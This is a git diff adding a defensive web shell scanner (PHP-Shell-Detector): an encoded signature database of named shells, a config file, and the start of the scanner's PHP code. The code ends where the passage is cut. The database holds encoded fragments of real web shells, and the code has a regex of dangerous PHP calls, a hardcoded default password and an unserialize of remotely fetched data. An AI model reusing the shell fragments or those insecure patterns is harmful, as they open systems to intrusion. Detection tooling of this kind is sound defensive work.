+N11bMF1bcGhwXSI7czo2NDoiazF2UVUwd04waExWVTkzUzJKMVJIZDZjM2R5ZFdKT2FuSmxWVVJH
+VjJkRVFrRjNZV3BDTTBGcFlVaEhkbVoxZSI7czoyMDoic3R1bnNoZWxsWzFdWzBdW3BocF0iO3M6
+NjQ6IkNSMk0yUXlObUl3WWpFcElIc2daMnh2WW1Gc0lDUjJOakU1WkRjMVpqZzdJR2xtSUNnaGFX
+NWZZWEp5WVhrb0oiO3M6MTU6InNwYW1bMF1bMF1bcGhwXSI7czo2NDoiRm9NR1E1VTBSU1Z6SnRU
+MkpZVWpsNGRGcDVjVVZhVm5wdWVuWjJRVWhhTURkemVtUkZOekJNVG10VVVVNWthMyI7czoyMDoi
+MW43M2N0aW9uWzJdWzBdW3BocF0iO3M6NjQ6IkNBZ0lDQWdMeThOQ2k4dkx5OHZMeTh2THk4dkx5
+OHZMeTh2THk4dkx5OHZMeTh2THk4dkx5OE5DZzBLRFFwcFoiO3M6MTk6InNhZmVtb2RlWzRdWzBd
+W3BocF0iO3M6NjQ6ImpJeU1qSXlNakl5TWpJeU1qSXlNakl5TWpJd29LSTFZZ1kyVnNhbUZvSUc1
+bGMyRnVhMk5wYjI1cGNtOTJZVzUiO3M6MTU6Imx1cm1bMF1bMF1bY2dpXSI7czo2NDoiazdJR1Y0
+YVhRN0lIMGdQejQ4UDNCb2NDQnBaaWhwYzNObGRDZ2tYMGRGVkZzaWREYzJNalJ1SWwwcEtYc2dJ
+QyI7czoxOToiZmlsZXNtYW5bN11bMF1bcGhwXSI7czo2NDoidmRISStYRzRpT3dvS0lDQUpaV05v
+YnlBaVBDOTBZV0pzWlQ0OEwzUmtQaUk3Q2dvZ0NXVmphRzhnSWp3dmRHRiI7czoyMDoicGhwc2hl
+bGxbMTZdWzBdW3BocF0iO3M6NjQ6IkdWdVpDSTdEUXBpY21WaGF6c05DZzBLRFFvdkwxQklVQ0JG
+ZG1Gc0lFTnZaR1VnWlhobFkzVjBhVzl1RFFwalkiO3M6MjE6ImthZG90c2hlbGxbMV1bMF1bcGhw
+XSI7czo2NDoibVp2Y21zN0RRb2dJQ0FnSUNBZ0lDQWdJQ0FnSUhONWMzUmxiU0FvWUNScmFXeHNa
+R0FwT3cwS0lDQWdJQ0FnSSI7czoxNzoiaXJjX2JvdFsxXVswXVtwbF0iO3M6NjQ6Im1JekV3Tnpj
+N0ppTXhNRGcxT3ljc0NpZHlkVjkwWlhoME5qUW5QVDRuSmlNeE1EUTBPeVlqTVRBNE1Ec21JekUi
+O3M6MTQ6InI1N1syXVswXVtwaHBdIjtzOjY0OiIyUmxkWE1nVUdWeWJDQlNaVzF2ZEdVZ1UyaGxi
+R3hjYmlJN0NncHplWE4wWlcwb1pHRjBaU2s3Q2dwemVYTjBaIjtzOjE4OiJhc21vZGV1c1swXVsw
+XVtwbF0iO3M6NjQ6IlBEOXdhSEFOQ21sbUtDUmZVRTlUVkZzaWEyVjVJbDBnUFQwZ0ltWXdaR1Zr
+TkRka1ptRTRZVE00WkdRME5tVTUiO3M6MTU6ImNtZFsxMF1bMF1bcGhwXSI7czo2NDoiNWhiV1U5
+TVNOamIyNTJaWEowUG0xa05Ud3ZZVDRwUEM5b01qNDhVRDRpT3dvS0lDQWdhV1lnS0NGcGMzTmxk
+QyI7czoyMToicmVtb3Rldmlld1swXVswXVtwaHBdIjtzOjY0OiJkWUszVm1NRmdyVlVSdVkwbEVN
+VEY0UldreVVrVlFhREJrVGpGa2JuRm9SVkY2YkRobmRsQnZUbGxtU0RGU2NYIjtzOjE0OiJyNTdb
+OV1bMF1bcGhwXSI7czo2NDoiSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDUmthWEpmYkds
+emRDQTlJR2x0WVhCZmJHbHpkQ2drYzNSeSI7czoyMzoic2hlbGxhcmNoaXZlWzBdWzBdW3BocF0i
+O3M6NjQ6ImduTDJodmJXVXZKeTRrZFhObGNpNG5MM0IxWW14cFkxOW9kRzFzTDJGalkyVnpYM2Rs
+WWk5amIyNW1hV2N1Y0ciO3M6MTk6InByaXY4X3NjclswXVswXVtwbF0iO3M6NjQ6InlPWEZtY0ha
+RVdqSXdlVlpWV0VGUUlpd2lNazk1TldoV1VYaFVZazlyUWxNcmFUUmFVRVZFWm5ObVNqRXpSa1Yi
+O3M6MjA6InBocHNoZWxsWzExXVswXVtwaHBdIjtzOjY0OiJsWFVrRnhPWEJRVTBKU2MwNTFZbmhr
+T1N0WVlXaDJkMDVsU1hGRWRGSllSSEV2ZUZGTFdFTmxWRGx4SzNRTkNrIjtzOjE2OiJiMzc0a1s3
+XVswXVtwaHBdIjtzOjY0OiJRdVlYQndaVzVrUTJocGJHUW9aV1JwZENrN1ptbGxiR1F1YzNSNWJH
+VXVaR2x6Y0d4aGVUMG5ibTl1WlNjN1pXIjtzOjI0OiJteXNxbF9hZG1pbmVyWzBdWzJdW3BocF0i
+O3M6NjQ6ImNtUmxjam9nTVhCNElITnZiR2xrSUNORFFrRkNOemc3SUgwS0kyTnZiblJsYm5RZ2V5
+QndZV1JrYVc1bk9pQXgiO3M6MjA6ImxvYWRzaGVsbFswXVswXVtwaHBdIjtzOjY0OiJCVlYzSTBj
+M0EwVUVVdmRYTkJRM3A1U0U1alF6UTVaMUU0VEVab1puUnhPREJCT0hWSVEzaFVLMGNyYVc1Q1Zt
+IjtzOjIwOiJmaWxlc21hblsxNl1bMF1bcGhwXSI7czo2NDoiWDJWNGFYTjBjeWdpYldGcGJDSXBL
+WHNOQ21WamFHOGdKSFJoWW14bFgzVndNUzRrYkdGdVoxc2tiR0Z1WjNWaCI7czoxNDoicjU3WzZd
+WzBdW3BocF0iO3M6NjQ6IlUxUkZ4YlhTOW5MQ0FpVzEwaUtUc0tDUWtKQ1ZSRWMyaGxiR3hmZEdG
+aWMxOXRiMlJwWm5sZmRHRmlLR04xY24iO3M6MTg6InRkc2hlbGxbMF1bMF1bcGhwXSI7czo2NDoi
+TUNrN0NRb2dhV1lvSVNSamIyNXVaV04wYVc5dUtTQjdJR1psS0NSc1lXNW5kV0ZuWlN3d0tUc2dm
+UW9nWld4eiI7czoxNToicjU3WzE5XVswXVtwaHBdIjtzOjY0OiJJaVJ5WldGc0wzTndiRzlwZEhv
+dWVtbHdJanNnUHo0aVBqeGljajQ4WW5JK0lBbzhhVzV3ZFhRZ2RIbHdaVDF6IjtzOjE0OiJjOTlb
+NF1bMF1bcGhwXSI7czo2NDoiUTdQQzltYjI1MFBpSXBPd29nSUNBZ0lDQWdJQ0FnSUNBZ0lDQThj
+Mk55YVhCMElIUjVjR1U5SW5SbGVIUXZhbSI7czoyMToicmVtb3Rldmlld1sxXVswXVtwaHBdIjtz
+OjY0OiJKRVpQVWsxN1JFWkpURVY5S1NsYk4xMDdDaUFnSUNna1ptbHNaVzVoYldVZ1BTQWtSazlT
+VFh0RVJrbE1SWDBwIjtzOjIyOiJwZXJsd2Vic2hlbGxbMF1bMF1bcGxdIjtzOjY0OiJkVFV5Y3NK
+M2RsZWpkUVZ6QTVSa1pXY0RkU1pFcHNKeXduYmtsSGNpdFhiRFpDVDNZNGNsUjVkVmNuTENkVldX
+IjtzOjIwOiJwaHBzaGVsbFsxMF1bMF1bcGhwXSI7czo2NDoiWDNJb0pFZE1UMEpCVEZNcE95Y3NE
+UW9KSjNCb2NGOXBibWtuQ1QwK0NTY2tTVTVKUFdsdWFWOW5aWFJmWVd4cyI7czoxODoiZHhzaGVs
+bFsyXVswXVtwaHBdIjtzOjY0OiJHUWdibTkzY21Gd1BpMHRQQzkwWkQ0bktUc0tDUWtKY0NnblBI
+UmtJRzV2ZDNKaGNENG5LVHNLQ1FrSmNDZ25QIjtzOjE3OiJwaHBzcHlbNF1bMF1bcGhwXSI7czo2
+NDoibHVaM01uWFZzblptbHNaUzExY0d4dllXUW5YU2tnZXlBL1BnbzhZbkkrUEdKeVBnbzhabWxs
+YkdSelpYUStDaSI7czoyMDoicGhwc2hlbGxbMTldWzBdW3BocF0iO3M6NjQ6IitTR1Y0UEM5MFpE
+NDhkR1FnZDJsa2RHZzlKekkxSlNjZ1ltZGpiMnh2Y2owbkl6STRNamd5T0NjK1BDOTBaRDQiO3M6
+MTc6ImphY2thbFs0XVswXVtwaHBdIjtzOjY0OiJnWEc0aU93cGxZMmh2SUNJOFlTQm9jbVZtUFNj
+a1VFaFFYMU5GVEVZL1lXTjBhVzl1UFhacFpYZEVZWFJoSm1SIjtzOjE2OiJteXNxbFswXVswXVtw
+aHBdIjtzOjY0OiJZM2xtUVdGWWFWbEJXRUl6UVZOQlNFZzBRM2xCWVVGWU5XMXdkbUZYTkc5S2VH
+WjNUMmxqYzBKRFJYQkdRa0k1IjtzOjE1OiJ3c29bMTNdWzBdW3BocF0iO3M6NjQ6InNJR1poYkhO
+bElDazdEUXBvWldGa1pYSW9JQ2RRY21GbmJXRTZJRzV2TFdOaFkyaGxKeUFwT3cwS0RRcGxZMmgi
+O3M6MjA6ImV4dHBsb3JlclswXVsyXVtwaHBdIjtzOjY0OiJWVGVYTjBaVzFQWW1wbFkzUWlLUW9K
+Q1ZObGRDQm1JRDBnWm5OdkxrZGxkRVpwYkdVb2MzUnlSbWxzWlc1aGJXIjtzOjE3OiJyaHRvb2xb
+MV1bMF1bYXNwXSI7czo2NDoiblF1UFNSc1lXNW5XeWQxY0d4dllXUnZheWRkT3dwOUNncHBaaWhw
+YzNObGRDZ2tYMUJQVTFSYkozVndiRzloWiI7czoyMToiZmF0YWxzaGVsbFswXVswXVtwaHBdIjtz
+OjY0OiJGWktUekpqV0c5b2NGWm1ORGtyVDJaMk4wbzRXRVk0ZDBSRk0wdFJLMlpSZGxwblQwSkVR
+bGhSWkhGSllqaG9UIjtzOjIwOiJwaHBzaGVsbFszNF1bMF1bcGhwXSI7czo2NDoiSFV3TURZelhI
+VXdNRFkxWEhVd01EWTBYSFV3TURZNVhIVXdNRFpEWEhVd01ETkNYSFV3TURJMlhIVXdNREl6WCI7
+czoxNToiY21kWzE5XVswXVtwaHBdIjtzOjY0OiJ5SWlrdVZtRnNkV1VLQ1cxaGVEMXZZbXBWY0d4
+dllXUXVSbWxsYkdSektDSnRZWGdpS1M1V1lXeDFaUW9LQ1daIjtzOjE3OiJ6ZWhpcjRbMV1bMF1b
+cGhwXSI7czo2NDoidldVOXJPSE54T0dWalVtcEliakZtVjBKNEt6TXlhbmRtVlhKQ2VuQTNXVWRK
+WkhsbE1scENiR2xLV25KaVpYUSI7czoyMDoicGhwc2hlbGxbMzZdWzBdW3BocF0iO3M6NjQ6ImMy
+aHphR1Y0YVhRb0tUdDlDbWxtSUNna1lXTjBJRDA5SUNKelpXTjFjbWwwZVNJcENuc0tJR1ZqYUc4
+Z0lqeGoiO3M6MTU6ImM5OVsyNF1bMF1bcGhwXSI7czo2NDoiZEdnaUxDSjNLeUlwT3dvSlpuZHlh
+WFJsSUNna1puQXNJaUlwSURzS0NXWjNjbWwwWlNBb0pHWndMQ1J6WVhabCI7czoyMjoic2ltYXR0
+YWNrZXJbMV1bMF1bcGhwXSI7czo2NDoiY2xkNWRHWlZNM05SUTJVNVlVWlliVk5OWkVOU1NFWjBS
+REJtTURaVVREZExlVzluT1VKWmRscFFSRVZUTkd4RCI7czoxNToid3NvWzE1XVswXVtwaHBdIjtz
+OjY0OiJJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FrWkc5elBTQWlRdlo1YkdVZ1FtbHlJRVJ2
+YzNsaElGWmhjbVI1IjtzOjE4OiJjYXN1czE1WzBdWzBdW3BocF0iO3M6NjQ6IjFsUFNReFhHNWNi
+aUk3Q2lBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0J3Y21sdWRDQjNhR2xzWlNnOFUwVk9SRVpKVEUiO3M6
+MTY6InRlbG5ldFswXVswXVtwbF0iO3M6NjQ6InlLRUJwYm1sZloyVjBLQ0p6WVdabFgyMXZaR1Vp
+S1NrZ1BUMGdJbTl1SWlrZ2V5QWdKSE5oWm1WdGIyUmxJRDAiO3M6MzY6ImNyaXN0ZXJjb3JwX2lu
+Zm9jb2xsZWN0b3JbMF1bMF1bcGhwXSI7czo2NDoiWnBaeTV3YUhBaUxBMEtDUWtpYkc5allYUmxJ
+R052Ym1acFp5NXBibU1pSUQwK0lDSnNiMk5oZEdVZ1kyOXVabSI7czoyMDoiZmlsZXNtYW5bMjRd
+WzBdW3BocF0iO3M6NjQ6ImpWRkJLVHpocmFFZHdaMjAxZDFoYVNscDBjbkZUYlU1MksydElTVkZJ
+T1U5clZVOWlhQ3RDUlZoRGNXNVNlVGwiO3M6MjI6InRiZHNlY3VyaXR5WzBdWzBdW3BocF0iO3M6
+NjQ6IkZVU0doU1UyNUtSVk5IZDNsT01XUmhUVEExWVdOWVZUQk9WRmt4VkRGV2FGcFdRbTVQVnpr
+MldYazVTRlF5VlQiO3M6MTU6Indzb1sxMl1bMF1bcGhwXSI7czo2NDoiRFZFMTRha1JVVDFaVVpW
+bDBTR0ZzYzBkMWJtTklWR3gyWTNKR2VFWXdXRnBWYlc1S1R6TnBXRU5OTVdwbWJFeCI7czoxOToi
+YmFja2Rvb3JbM11bMF1bcGhwXSI7czo2NDoiek12YjBwT1dtMU5OMDVRUW5JMVkzaHlhekJ6TlVR
+clUzRnFNa2hhWWs1bmNHcExLMmhFTTBjaUxDSkllazVQViI7czoyNToic2hlbGxfdXBsb2FkZXJb
+NF1bMF1bcGhwXSI7czo2NDoiVng0TkRoY2VEWTJYSGd6TTF4NE5EbGNlRFUwWEhnMVpWeDRObUpj
+ZURNMVhIZzBNRng0TTJOY2VEWTVYSGd6TiI7czoxODoicG9zdG1hblswXVsxXVtwaHBdIjtzOjY0
+OiJObFltVmlaV0luUGcwS1BHTmxiblJsY2o0TkNqeGlQanhtYjI1MElITnBlbVU5SnpZbklHWmhZ
+MlU5SjFkbFltIjtzOjE3OiJjb2RlcnpbMl1bMF1bcGhwXSI7czo2NDoiSE9XdFFWa0pRVlRGUksx
+QkhiSFZqU0ZZd1NVaFNOV05IVlRsaFIyeHJXa2RXZFVsSE5XaGlWMVU1V1ZkT01FbCI7czoyMToi
+bG9jdXNzaGVsbFsyXVswXVtwaHBdIjtzOjY0OiJOcGRHVXNJRGd3TENBa1pYSnlibThzSUNSbGNu
+SnpkSElzSURNd0tUc2dEUXBwWmlBb0lTUm1jQ2tnZXlBTkNpIjtzOjE5OiJuaXhzaGVsbFsxXVsw
+XVtwaHBdIjtzOjY0OiJWL2paQXhVSUJPMGM4ektjU210MXJnTmhOMHk4Z21PeHB3bHhkRzREWkxK
+QVY1dHFkcHFtS3d1cDVFeUM2SlQyIjtzOjE5OiJ3ZWJhZG1pblsxXVsyXVtwaHBdIjtzOjY0OiI5
+bk93b0tJQ0JwWmlBb0pISmxjWFZwY21VcElIc0tJQ0FnSUNNZ1lXeHNJR1p2ZFc1a0lHZHZibTVo
+SUdKbElHIjtzOjE3OiJ0ZWxuZXRkWzJdWzBdW3BsXSI7czo2NDoiaHlaV1k5SWlWelAzZHZjbXRm
+WkdseVBTVnpJajRsY3p3dllUNHZ0Q3dLSkZCSVVGOVRSVXhHTENCMWNteGxibSI7czoxOToicGhw
+c2hlbGxbM11bMF1bcGhwXSI7czo2NDoiMFpYSStQSFJoWW14bFBqeDBjajQ4ZEdRK1BHWnZjbTBn
+WVdOMGFXOXVQVndpSkZOR2FXeGxUbUZ0WlQ4a2RYSiI7czoxOToic2FmZW1vZGVbM11bMF1bcGhw
+XSI7czo2NDoiY21GdVoyVW9Ja0VpTENKYUlpa2dZWE1nSkd4bGRIUmxjaWtnRFFvSmV5QU5DZ2tr
+WW05dmJDQTlJRUJwYzE5ayI7czoyMDoiZGV2aWx6MGRlWzBdWzBdW3BocF0iO3M6NjQ6IjBaRDVj
+YmlJN0RRcHdjbWx1ZENBaVBIUmtQbHNnUEdFZ1kyeGhjM01nUFNCY0ltaGxZV1JjSWlCb2NtVm1J
+RDAiO3M6MTc6Imxvc3RkY1sxXVswXVtwaHBdIjtzOjY0OiJTVzVNYldnd1lsZDRlbU5IVm1waFYw
+WnpXVEpvYUdOdVRXOUtSamxSVkRGT1ZWZDVaR2hLTVRCd1RHbGphVkJwIjtzOjIwOiJ2MGxkM20w
+cnRbMF1bMF1bcGhwXSI7czo2NDoiY01tSnZkRnd5WFRvZ2NHaHdZbTkwSURJdU1DQmllVHNnSTJO
+eVpYZEFZMjl5Y0M0aUtUc05DaUFnSUNBZ0lDQSI7czoxNToicGJvdFsyXVswXVtwaHBdIjtzOjY0
+OiJRdFkyOXNiM0k2SUNNd01EQXdNREE3Q24wS0xuTjBlV3hsTkNCN1ptOXVkQzEzWldsbmFIUTZJ
+R0p2YkdSOUNtIjtzOjE1OiJrcmFsWzBdWzBdW3BocF0iO3M6NjQ6IlpHMUdjMlJYVlRsSmJFcHNZ
+bTFHZEZwVU9HbEpRemdyUkZGdk9GQXpRbTlqUTBJNVNVZFdjMk15Vm5CYWFXZHIiO3M6MTc6Imhz
+aGVsbFswXVswXVtwaHBdIjtzOjY0OiJOMkpDYmxGMmRXUjRXREp1WlZadEt6Um9NekI0TjFBeFVF
+aDJXblZIWWl0WVpub3hWbVpoY2tsaGFqWmljV2haIjtzOjIwOiJob3N0ZGV2aWxbMF1bMF1bcGhw
+XSI7czo2NDoiOUlFTnZiVzFoYm1SVWVYQmxMbFJsZUhRN0RRb2dJQ0FnSUNBZ0lDQWdJQ0JqYjIx
+dExrTnZiVzFoYm1SVVpYaCI7czoyMjoiYXNweC1zaGVsbFswXVswXVthc3B4XSI7czo2NDoiQ0l2
+SWl3Z0pHNWhiV1VwT3dva1puSWdQU0FpWEhnMU1GeDROR0pjZURBelhIZ3dOQ0k3Q2lSbWNpQXVQ
+U0FpWCI7czoyNjoiaXRzZWN0ZWFtX3NoZWxsWzJdWzBdW3BocF0iO3M6NjQ6IklIc2dhV1lnS0NG
+cGMxOXVkVzFsY21saktDUm1jV0pmYkdWdVoyaDBLU2tnZXlSbWNXSmZiR1Z1WjJoMElEMGciO3M6
+MjI6IkZhVGFMaXNUaUN6WzRdWzBdW3BocF0iO3M6NjQ6Im1kcGJpMXNaV1owT2lBMWNIZzdEUXA5
+RFFwcGJuQjFkQ0FzSUhSbGVIUmhjbVZoSUN3Z1luVjBkRzl1SUN3Z1kiO3M6Mjc6ImJydXRlX2Zv
+cmNlX3Rvb2xbMV1bMF1bcGhwXSI7czo2NDoiZ0lEaHdkQ0FnSUNBZ0lDQWhhVzF3YjNKMFlXNTBP
+d3BpWVdOclozSnZkVzVrTFdOdmJHOXlPaUFnSUNNeE1URSI7czoxODoiY3J5c3RhbFswXVswXVtw
+aHBdIjtzOjY0OiJjR1U5WENKMFpYaDBYQ0krUEdKeVBncDFjMlZ5Ym1GdFpTQTZJRHhKVGxCVlZD
+QnphWHBsUFZ3aU1UVmNJaUIyIjtzOjE3OiJ1cGRhdGVbMF1bMF1bcGhwXSI7czo2NDoiWEUzVTFJ
+dlVITmFSRFp3V2xBNU1XTk5WQzlNT0ZkWFJYcExkbUptVkV4Sk9GaGpOa0ZxVm5wcmRuWjJOMnBw
+TiI7czoyMjoiRmFUYUxpc1RpQ3pbNV1bMF1bcGhwXSI7czo2NDoiNWpkR2x2Ym5Nc0ozTm9aV3hz
+WDJWNFpXTW5LU2w3SkdWNFpXTTlJSE5vWld4c1gyVjRaV01vSkdOdmJXMWhibSI7czoxNzoiamFj
+a2FsWzVdWzBdW3BocF0iO3M6NjQ6ImpibFZ1UzFOcloyVXpRbWhqTTA0d1lVaEtNVXREVW1aVmEx
+WlNWbFZXVkZaR2MyNWhSemt4V2tkc2RXRlRaR1IiO3M6MTQ6ImNtZFs1XVswXVtwaHBdIjtzOjY0
+OiIxUm5ObTkwSzNoRVZsbE1UM05EZGk5YWVtaDFSekZaVlZZNWRHOWhXbWRYVFVobVpWRkhUbGsz
+ZFV4M01rTmtXIjtzOjE1OiJjOTlbMjNdWzBdW3BocF0iO3M6NjQ6IjFjSGdnT0hCNElDRnBiWEJ2
+Y25SaGJuUTdZbTl5WkdWeU9pQnViMjVsSUNGcGJYQnZjblJoYm5RN1ltOXlaR1YiO3M6MjA6ImNv
+bmZpZ3NweVsyXVswXVtwaHBdIjtzOjY0OiIwWm1ZdllsVlpSVmhrYkc4d2MxWkdla1U0UTJFNVFW
+UkRObEZ3Wld0aVprRlFVbEkyUlZwcU5GQmpkSGN5ZWpWIjtzOjIyOiJib2dlbF9zaGVsbFswXVsw
+XVtwaHBdIjtzOjY0OiJKRjlRVDFOVVd5ZHpibTRuWFRzS2ZRcDlJR1ZzYzJVZ2V3b2tkVEZ3UFNS
+ZlIwVlVXeWR6Ym00blhUc0tmUXA5IjtzOjIyOiJzbmlwZXJzaGVsbFswXVswXVtwaHBdIjtzOjY0
+OiIyTnlhV0pwYm1jZ2RHaGxJR1J5YVhabElIUjVjR1VnYjJZZ1lTQm5hWFpsYmlCRWNtbDJaU0J2
+WW1wbFkzUXVEIjtzOjE4OiJleHBsb3JlWzBdWzBdW2FzcF0iO3M6NjQ6ImdvZ0lDQWdJQ0FnSUNB
+Z1BIUmtJR0ZzYVdkdVBTSmpaVzUwWlhJaUlHTnNZWE56UFNKMGFYUnNaU0krUkdGMFkiO3M6MTY6
+Im15c3FsWzRdWzBdW3BocF0iO30=
diff --git a/doc/PHP-Shell-Detector-master/shelldetect.ini b/doc/PHP-Shell-Detector-master/shelldetect.ini
new file mode 100644
index 0000000000000000000000000000000000000000..027b5885cde9e7e68cf8787a1a8f4f85b9bdeb86
--- /dev/null
+++ b/doc/PHP-Shell-Detector-master/shelldetect.ini
@@ -0,0 +1,14 @@
+extension[]=php
+extension[]=txt
+;is_cron=true
+;showlinenumbers=true
+;dateformat="H:i:s d/m/Y"
+;language=""
+;directory=""
+;scan_hidden=true
+;report_format="\s\h\e\l\l\d\e\t\e\c\t\o\r\_Gi-dmY.\h\t\m\l"
+;filelimit=3000
+;authentication=false
+;remotefingerprint=false
+;hidesuspicious=false
+;submitfile=1
diff --git a/doc/PHP-Shell-Detector-master/shelldetect.php b/doc/PHP-Shell-Detector-master/shelldetect.php
new file mode 100644
index 0000000000000000000000000000000000000000..8fb3e1f1fa6e62ffe68c708b432c98a5e2ad1545
--- /dev/null
+++ b/doc/PHP-Shell-Detector-master/shelldetect.php
@@ -0,0 +1,731 @@
+<?php
+/**
+ * Web Shell Detector v1.66
+ * Web Shell Detector is released under the MIT License <http://www.opensource.org/licenses/mit-license.php>
+ * https://github.com/emposha/PHP-Shell-Detector
+ */
+
+set_time_limit(0);
+
+//own error handler
+set_error_handler(array("shellDetector", "error_handler"));
+
+// set the default timezone to use.
+date_default_timezone_set('GMT');
+
+$params = array('extension' => array('php', 'txt'));
+if (is_file('shelldetect.ini')) {
+  $params = parse_ini_file('shelldetect.ini');
+}
+
+//static settings initialize
+shellDetector::$_settings = $params;
+
+$shelldetector = new shellDetector($params);
+
+if ($shelldetector->isConsole()) {
+  $options = getopt("d:hcb");
+  if (array_key_exists("d",$options)) {
+    $shelldetector->setDir($options["d"]);
+  }
+  if (array_key_exists("b",$options)) {
+    $shelldetector->setBrief(true);
+  }
+  if (array_key_exists("c",$options)) {
+    shellDetector::$_settings['is_cron'] = true;
+    $shelldetector->setCron(true);
+  }
+}
+
+$shelldetector->start();
+
+class shellDetector {
+
+  //settings: extensions that should be scanned
+  private $extension = array('php');
+
+  //settings: show line number where suspicious function used
+  private $showlinenumbers = true;
+
+  //settings: used with access time & modified time
+  private $dateformat = "H:i:s d/m/Y";
+
+  //settings: if I want to use other language
+  private $language = '';
+
+  //settings: if console used
+  private $console = false;
+
+  //settings: if brief info is needed
+  private $brief = false;
+
+  //settings: scan specific directory
+  private $directory = '.';
+
+  //settings: scan hidden files & directories
+  private $scan_hidden = true;
+
+  //settings: perform different task
+  private $task = '';
+
+  //settings: used with is_cron(true) file format for report file
+  private $report_format = '\s\h\e\l\l\d\e\t\e\c\t\o\r\_Gi-dmY.\h\t\m\l';
+
+  //settings: if true run like a cron (no output)
+  private $is_cron = false;
+
+  //settings: maximum files to scan (more then 30000 you should scan specific directory)
+  private $filelimit = 30000;
+
+  //settings: protect script with user & password in case to disable simply set to NULL
+  private $authentication = array("username" => "admin", "password" => "protect");
+
+  //settings: get shells signatures db by remote
+  private $remotefingerprint = false;
+
+  //settings: hide suspicious files
+  private $hidesuspicious = false;
+
+  //settings: type of file submission to review (0 - old one not secure but will work with allow_url_fopen = false, 1 - new one more secure but allow_url_fopen need to be true.)
+  private $submitfile = 1;
+
+  /*
+   * System variables
+   */
+  //system variable used with output
+  static $_settings = array();
+  
+  //system variable used with is_cron
+  static $_output = '';
+
+  // global counters
+  private $counter = 0;
+  private $suspcounter = 0;
+
+  //system variable hold all scanned files
+  private $_files = array();
+
+  //system variable hold bad files
+  private $_badfiles = array();
+
+  //system: hold shells signatures
+  private $fingerprints = array();
+
+  //system: title
+  private $_title = 'Web Shell Detector';
+
+  //system: version of shell detector
+  private $_version = '1.66';
+
+  //system: regex for detect Suspicious behavior
+  private $_regex = '%(preg_replace.*\/e|`.*?\$.*?`|\bcreate_function\b|\bpassthru\b|\bshell_exec\b|\bexec\b|\bbase64_decode\b|\bedoced_46esab\b|\beval\b|\bsystem\b|\bproc_open\b|\bpopen\b|\bcurl_exec\b|\bcurl_multi_exec\b|\bparse_ini_file\b|\bshow_source\b)%';
+
+  //system: public key to encrypt file content
+  private $_public_key = 'LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0NCk1JR2ZNQTBHQ1NxR1NJYjNEUUVCQVFVQUE0R05BRENCaVFLQmdRRDZCNWZaY2NRN2dROS93TitsWWdONUViVU4NClNwK0ZaWjcyR0QvemFrNEtDWkZISEwzOHBYaS96bVFBU1hNNHZEQXJjYllTMUpodERSeTFGVGhNb2dOdzVKck8NClA1VGprL2xDcklJUzVONWVhYUQvK1NLRnFYWXJ4bWpMVVhmb3JIZ25rYUIxQzh4dFdHQXJZWWZWN2lCVm1mRGMNCnJXY3hnbGNXQzEwU241ZDRhd0lEQVFBQg0KLS0tLS1FTkQgUFVCTElDIEtFWS0tLS0tDQo=';
+
+  private $_self = '';
+
+  /**
+   * Constructor
+   */
+  function __construct($settings = null) {
+    if (is_array($settings)) {
+      $own = get_object_vars($this);
+      foreach ($settings as $key => $value) {
+        if (key_exists($key, $own) && substr($key, 0, 1) != '_') {
+          $this->$key = $value;
+        }
+      }
+      $this->_self = basename(__FILE__);
+    }
+
+    if ($this->authentication != null) {
+      if ((!isset($_SERVER['PHP_AUTH_USER']) || (isset($_SERVER['PHP_AUTH_USER']) && $_SERVER['PHP_AUTH_USER'] != $this->authentication['username'])) || (!isset($_SERVER['PHP_AUTH_PW']) || (isset($_SERVER['PHP_AUTH_PW']) && $_SERVER['PHP_AUTH_PW'] != $this->authentication['password']))) {
+        header('WWW-Authenticate: Basic realm="Login"');
+        header('HTTP/1.0 401 Unauthorized');
+        echo $this->t('Please login to continue.');
+        exit ;
+      }
+    }
+
+    if (isset($_GET['task'])) {
+      $this->task = $_GET['task'];
+    }
+
+    if (isset($_GET['s']) && 1 == $_GET['s']) {
+      $this->hidesuspicious = false;
+    }
+
+    if (file_exists('shelldetect.db')) {
+      $context = stream_context_create(array('http' => array('timeout' => 30)));
+      $this->fingerprints = unserialize(base64_decode(file_get_contents('shelldetect.db', 0, $context)));
+    }
+
+    if ($this->remotefingerprint) {
+      $this->fingerprints = unserialize(base64_decode(file_get_contents('https://raw.github.com/emposha/PHP-Shell-Detector/master/shelldetect.db')));
+    }
+  }
+
+  public function setDir($dir) {
+    $this->directory = $dir;
+  }
+
+  public function setCron($val) {
+    $this->is_cron = $val;
+  }
+
+  public function setBrief($val) {
+    $this->brief = $val;
+  }
+
+  public function isBrief() {
+    return $this->brief;
+  }
+
+  public function isConsole() {
+    return $this->console;
+  }
+
+  /**
+   * Start function
+   */
+  public function start() {
+    switch ($this->task) {
+      case 'sendfile':
+        $this->sendfile();
+        break;
+      case 'getsha':
+        $this->header();
+        $this->filescan();
+        $this->showsha();
+        $this->footer();
+        break;
+      case 'update':
+        $this->header();
+        $this->update();
+        $this->footer();
+        break;
+      default:
+        $this->header();
+        $this->version();
+        $this->filescan();
+        $this->anaylize();
+        $this->footer();
+        break;
+    }
+  }
+
+  /**
+   * Update function get latest update
+   */
+  private function update() {
+    if ($this->version()) {
+      $context = stream_context_create(array('http' => array('timeout' => 30)));
+      $content = file_get_contents('https://raw.github.com/emposha/PHP-Shell-Detector/master/shelldetect.db', 0, $context);
+      chmod('shelldetect.db', 0777);
+      if (file_put_contents('shelldetect.db', $content)) {
+        self::output($this->t('Shells signature database updated succesfully!'));
+      } else {
+        self::output($this->t('Cant save shells signature database please check permissions'), 'error');
+      }
+    } else {
+      self::output($this->t('Your shells signatures database already updated!'));
+    }
+  }
+
+  /**
+   * Check version function
+   */
+  private function version() {
+    $context = stream_context_create(array('http' => array('timeout' => 10, 'header' => 'Connection: close')));
+    //check application version
+    $app_version = floatval($this->_version);
+    $server_version = file_get_contents('https://raw.github.com/emposha/PHP-Shell-Detector/master/version/app', 0, $context);
+    if (strlen($server_version) != 0 && floatval($server_version) != 0 && (floatval($server_version) > $app_version)) {
+      self::output($this->t('New version of application found. Please update!'), 'error');
+    } else if (strlen($server_version) == 0 || intval($server_version) == 0) {
+      self::output($this->t('Cant connect to server! Application version check failed!'), 'error');
+    }
+    
+    $version = isset($this->fingerprints['version']) ? $this->fingerprints['version'] : 0;
+    $server_version = file_get_contents('https://raw.github.com/emposha/PHP-Shell-Detector/master/version/db', 0, $context);
